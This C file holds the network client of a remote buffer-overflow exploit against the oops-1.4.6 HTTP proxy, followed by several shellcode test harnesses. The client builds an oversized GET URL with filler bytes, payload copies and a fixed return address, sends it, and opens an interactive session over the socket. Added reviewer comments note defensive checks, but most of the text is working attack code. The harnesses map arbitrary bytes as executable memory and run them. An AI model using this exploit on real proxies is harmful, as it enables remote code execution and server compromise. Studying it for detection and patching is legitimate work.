/*
 * Network client from a proof of concept aimed at the oops-1.4.6 HTTP proxy
 * (target and default port 3128 are taken from the banner and usage text).
 *
 * It builds one oversized HTTP/1.0 request line and sends it:
 *
 *     "GET http://p" + <buf> + " HTTP/1.0\r\n\r\n"
 *
 * so the oversized part sits where the host component of the URL would be.
 * <buf> is a run of the filler byte 0xbf with two payload copies and a 32-bit
 * address constant placed at fixed offsets.
 *
 * shellcode(), res(), spawned_shell(), OFFSET2, RETOFF and BUFADDR are defined
 * outside this block; what is said about them below is inferred from how they
 * are used here.
 *
 * Reviewer notes (defensive reading):
 *  - On the wire this is a GET whose URL host part is far longer than any
 *    legitimate hostname and consists mostly of 0xbf bytes; a length limit on
 *    the request line or host component, at the proxy or in front of it, is
 *    the check this request is built to find missing.
 *  - BUFADDR is a compile-time constant, so the code assumes a fixed address
 *    inside the target process. NOTE(review): address randomization or a
 *    stack protector in the target build would be expected to break that
 *    assumption; confirm against the affected versions.
 *  - The function has an implicit int return type and no return statement.
 */
main(int ac, char** av){
/* SZ: size of both local buffers. FIL: filler byte used to pad the URL. */
#define SZ 0x2000
#define FIL 0xbf
    /* c and i are declared but never used in this function. */
    char buf[SZ],buf2[SZ],*pc,c;
    int i,sock;
    struct sockaddr_in sin;
    short port=3128;
    unsigned *pu;

    /* Start from SZ filler bytes; buf holds no NUL byte after this. */
    memset(buf,FIL,SZ);
    /*
     * presumably writes a NUL-terminated payload at the start of buf, since
     * strlen() is applied right after; if it did not terminate, strlen would
     * read past the end of buf. TODO confirm against shellcode()'s definition.
     */
    shellcode(buf);
    /* Replace that terminator with filler so the string runs on. */
    buf[strlen(buf)]=FIL;
    /* Second payload copy at OFFSET2, terminator replaced the same way. */
    pc=&buf[OFFSET2];
    shellcode(pc);
    pc+=strlen(pc);
    *pc=FIL;
    /*
     * Store BUFADDR as an unsigned at byte offset RETOFF. The store goes
     * through a char-to-unsigned pointer cast, so it is only well defined if
     * &buf[RETOFF] is suitably aligned. The string is then cut at RETOFF+4.
     * NOTE(review): a zero byte inside BUFADDR would end the string earlier.
     */
    pu=(unsigned*)&buf[RETOFF];
    *pu=BUFADDR;
    buf[RETOFF+4]=0;

    /*
     * Unbounded strcpy/strcat into buf2[SZ]: the 12-byte prefix, buf, the
     * 13-byte suffix and the NUL fit only if RETOFF+4 <= SZ-26.
     * NOTE(review): RETOFF is not visible here; verify, otherwise this
     * overruns the local buffer.
     */
    strcpy(buf2,"GET http://p");
    strcat(buf2,buf);
    strcat(buf2," HTTP/1.0\r\n\r\n");

    fprintf(stderr,"oops-1.4.6 remote xpl0it for 4.x by diman.\n");
    fprintf(stderr,"use for educational purpose only.\n");
    /* Argument check runs only after the request has already been built. */
    if(ac<2) { fprintf(stderr,"usage: ./oopz target_host [port, def=3128]\n"); exit(0); }
    pc=av[1];
    /*
     * atoi() reports no errors and the result is narrowed to short, so a
     * non-numeric argument becomes 0 and values above 32767 do not fit.
     */
    if(ac>2) port=atoi(av[2]);
    /* res() is treated as returning zero on failure; it fills in sin. */
    if(!res(pc,&sin)) { fprintf(stderr,"can't resolve %s\n",pc); exit(0); }
    /* The socket() result is not checked before it is used. */
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    sin.sin_port=htons(port);
    /* Failure paths exit with status 0, so callers cannot tell them apart. */
    if(connect(sock,(struct sockaddr*)&sin,sizeof(struct sockaddr))==-1) { fprintf(stderr,"can't connect %s:%d\n",pc,port); exit(0); }
    fprintf(stderr,"Connected. Sending surprise...\n");
    /* Single send(); a short write or an error goes unnoticed. */
    send(sock,buf2,strlen(buf2),0);
    /*
     * Hands the connected socket to a helper defined elsewhere.
     * NOTE(review): by its name it runs an interactive session over the
     * socket; confirm in its definition.
     */
    spawned_shell(sock);
}
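/*
 * Test harness: map the file named in argv[1] as read+execute memory, report
 * its size and how many zero bytes it contains, then call its first byte as a
 * function.
 *
 * The mapped bytes run inside this process with its privileges and open
 * descriptors; nothing in this function confines them.
 *
 * Returns EXIT_FAILURE on any setup error. The final return is reached only
 * if the called code returns.
 */
int main(int argc, char **argv)
{
    int fd;
    struct stat sbuf;
    void *map;
    void (*shellcode)(void);
    size_t len, i, z = 0;
    const unsigned char *p;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s [filename]\n", argv[0]);
        return EXIT_FAILURE;
    }

    if ((fd = open(argv[1], O_RDONLY)) < 0) {
        perror("open() failed");
        return EXIT_FAILURE;
    }

    if (fstat(fd, &sbuf)) {
        /* Report first so close() cannot disturb errno. */
        perror("fstat() failed");
        close(fd);
        return EXIT_FAILURE;
    }

    /* A zero-length mapping is rejected by mmap(); say why up front. */
    if (sbuf.st_size <= 0) {
        fprintf(stderr, "%s: nothing to map (empty file)\n", argv[1]);
        close(fd);
        return EXIT_FAILURE;
    }
    len = (size_t)sbuf.st_size;

    map = mmap(NULL, len, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        perror("mmap() failed");
        close(fd);
        return EXIT_FAILURE;
    }
    /* The mapping stays valid after the descriptor is closed. */
    close(fd);

    printf("Read %zu bytes of shell code. Here goes.\n", len);

    /* Count zero bytes; size_t index so large files cannot overflow an int. */
    p = map;
    for (i = 0; i < len; i++) {
        if (p[i] == '\0')
            z++;
    }
    if (z > 0)
        printf("Shellcode contains %zu zero bytes.\n", z);

    printf("~~~ Running shellcode ~~~\n");
    /* Explicit object-to-function pointer conversion (POSIX-style). */
    shellcode = (void (*)(void))map;
    shellcode();

    /* should not be reached */
    return EXIT_FAILURE;
}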
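/*
 * Test harness: load bytes from a file (argv[1]) or from stdin (argv[1] is
 * "-") into a read+write+execute mapping, report the size and the number of
 * zero bytes, then call the first byte as a function.
 *
 * The mapping is writable and executable at the same time, and the loaded
 * bytes run inside this process with its privileges; nothing here confines
 * them.
 *
 * Returns EXIT_FAILURE on any setup error. The final return is reached only
 * if the called code returns.
 */
int main(int argc, char **argv)
{
    /*
     * Never read or written in this function.
     * NOTE(review): presumably reserves stack space below main's frame;
     * confirm the intent, an optimizing compiler may drop it.
     */
    char *stack_space[0x1000];
    int fd;
    int c;
    struct stat sbuf;
    void *map;
    void (*shellcode)(void);
    size_t i, z = 0, bufsize, numb = 0;
    unsigned char *p, *grown;

    (void)stack_space;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s (<filename>|-)\n", argv[0]);
        return EXIT_FAILURE;
    }

    if (strcmp(argv[1], "-") == 0) {
        /* stdin: accumulate into a heap buffer that grows in 4 KiB steps. */
        bufsize = 4096;
        p = malloc(bufsize);
        if (p == NULL) {
            perror("malloc() failed");
            return EXIT_FAILURE;
        }

        while ((c = getchar()) != EOF) {
            if (numb == bufsize) {
                bufsize += 4096;
                /* Keep the old pointer until realloc() is known to succeed. */
                grown = realloc(p, bufsize);
                if (grown == NULL) {
                    perror("realloc() failed");
                    free(p);
                    return EXIT_FAILURE;
                }
                p = grown;
            }
            p[numb++] = (unsigned char)c;
            if (c == '\0')
                z++;
        }

        /* Empty input gives a zero length, which mmap() rejects. */
        map = mmap(NULL, numb, PROT_READ | PROT_EXEC | PROT_WRITE,
                   MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
        if (map == MAP_FAILED) {
            perror("mmap() failed");
            free(p);
            return EXIT_FAILURE;
        }
        memcpy(map, p, numb);
        free(p);
    } else {
        if ((fd = open(argv[1], O_RDONLY)) < 0) {
            perror("open() failed");
            return EXIT_FAILURE;
        }

        if (fstat(fd, &sbuf)) {
            perror("fstat() failed");
            close(fd);
            return EXIT_FAILURE;
        }

        if (sbuf.st_size <= 0) {
            fprintf(stderr, "%s: nothing to map (empty file)\n", argv[1]);
            close(fd);
            return EXIT_FAILURE;
        }
        numb = (size_t)sbuf.st_size;

        /* MAP_PRIVATE: writes through the mapping never reach the file. */
        map = mmap(NULL, numb, PROT_READ | PROT_EXEC | PROT_WRITE,
                   MAP_PRIVATE, fd, 0);
        if (map == MAP_FAILED) {
            perror("mmap() failed");
            close(fd);
            return EXIT_FAILURE;
        }
        close(fd);

        p = map;
        for (i = 0; i < numb; i++) {
            if (p[i] == '\0')
                z++;
        }
    }

    printf("Read %zu bytes of shell code. Here goes.\n", numb);
    if (z > 0)
        printf("Shellcode contains %zu zero bytes.\n", z);

    printf("~~~ Running shellcode ~~~\n");
    /* Explicit object-to-function pointer conversion (POSIX-style). */
    shellcode = (void (*)(void))map;
    shellcode();

    /* should not be reached */
    return EXIT_FAILURE;
}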
/*
 * Call the bytes at sc.code as a function taking no arguments and discard
 * whatever it returns.
 *
 * Always returns EXIT_SUCCESS when the call comes back; a fault inside the
 * called bytes is not handled here.
 * NOTE(review): where sc.code lives is not visible from this block; if that
 * memory is not executable the call faults rather than running.
 */
int sctest(ShellCode const sc)
{
    /* Object pointer converted to a function pointer and invoked directly. */
    ((int (*)())sc.code)();

    return EXIT_SUCCESS;
}
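/*
 * Print the length of the byte string `code` (defined elsewhere in the file)
 * and then call it as a function.
 *
 * The length comes from strlen(), so it stops at the first zero byte and
 * under-reports any payload that contains one.
 * NOTE(review): whether `code` sits in executable memory is not visible here;
 * on builds with non-executable data pages the call faults.
 */
int main(int argc, char** argv)
{
    (void)argc;
    (void)argv;

    /* strlen() returns size_t; printing it with %d is a format mismatch. */
    printf("Shellcode size is %zu bytes\n", strlen(code));

    int (*shellcode)() = (int (*)())code;
    shellcode();

    return 0;
}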
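/*
 * Write the first 257 bytes found at the address of `shellcode` (defined
 * elsewhere in the file) to stdout, then call it.
 *
 * A size printout based on sizeof(&shellcode) was left disabled in the
 * original; that expression is the size of a pointer, not of the code.
 * NOTE(review): the 0..256 range is a fixed guess at the length, so the dump
 * may stop short of, or run past, the real end of the code.
 */
int main()
{
    /*
     * View the code as bytes. The original passed the address itself to
     * putchar(), which printed a byte of the pointer value instead of the
     * byte stored at that address.
     */
    const unsigned char *bytes = (const unsigned char *)shellcode;
    int i;

    for (i = 0; i <= 256; i++)
        putchar(bytes[i]);

    shellcode();

    return 0;
}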